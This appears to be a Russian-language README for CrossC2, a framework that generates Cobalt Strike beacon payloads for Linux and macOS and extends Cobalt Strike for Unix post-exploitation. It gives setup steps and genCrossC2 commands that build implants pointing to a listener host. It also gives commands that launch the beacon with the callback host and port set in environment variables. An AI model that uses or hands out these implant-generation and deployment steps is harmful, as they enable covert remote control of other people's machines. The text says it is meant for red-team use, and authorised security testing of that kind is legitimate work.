
сгенерировать кроссплатформенную полезную нагрузку CobaltStrike
Поддерживает оценку безопасности CobaltStrike на других платформах (Linux/MacOS/...), а также включает поддержку разработки модулей пост-эксплуатации Unix
| CS3.14 (исправления ошибок) | CS4.0 | CS4.X (4.1~4.8) | |
|---|---|---|---|
| Ветка Master | ✅ | ||
| Ветка cs4.0 | ✅ | ||
| Ветка cs4.1 | ✅ | ||
| Страница релиза <= v2.1 | ✅ | ||
| Страница релиза >= v2.2 | ✅ |

- Загрузка
Загрузите CrossC2.cna genCrossC2 CrossC2Kit, измените конфигурацию CrossC2.cna
- Создайте слушатель и скопируйте ключ
windows/beacon_https/reverse_https.cobaltstrike.beacon_keys из каталога teamserver в локальный
- Расширение функционала
CrossC2Kit_Loader.cna, включающий загрузку в память и другие функцииcs4.x отсутствуют функции управления файлами и списка процессов, вы должны использовать этот Loader для перезапуска
- Генерация beacon
Используйте функцию GUI, предоставленную cli или cna, для генерации beacon по умолчанию
genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>
пример:
1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol
genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
2. specify the BEACON of the custom protocol dynamic library
genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out
3. specify the C2Profile that needs to be automatically parsed
genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
Более продвинутые конфигурации можно найти в документации: 📄Справочник
- Запуск beacon
export CCPATH=/opt/ && /tmp/c2/tmp/c2 /tmp/c2-rebind.soexport CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2export CCDEBUG=1 && /tmp/c2CrossC2Kit: https://github.com/CrossC2/CrossC2Kit
CrossC2Kit — это расширение для инфильтрации на платформе Unix, полученное из CrossC2. Использует открытый скриптовый движок Aggressor Script. Он может использоваться для создания автоматизации, имитирующей рабочие процессы Red Team, и расширения клиента CobaltStrike.
CrossC2Kit унаследован от оригинальных функций CobaltStrike, поэтому синтаксис разработки и написания по-прежнему ссылается на официальную документацию: https://trial.cobaltstrike.com/aggressor-script/index.html
Но он имеет некоторые расширения API поверх CrossC2 для управления beacon на платформе Unix
API: 📄Справочник
Demo: 
Только для внутреннего использования предприятиями и организациями. Этот фреймворк имеет некоторую степень нестабильности. Непрофессионалам запрещено его использовать. Никто не должен использовать его в незаконных целях или для извлечения прибыли. Кроме того, публикация несанкционированных модифицированных версий также запрещена, иначе вы несете юридическую ответственность.
Спасибо @Emma за логотип, разработанный для CrossC2, который выполнен в стиле серий Armitage и CobaltStrike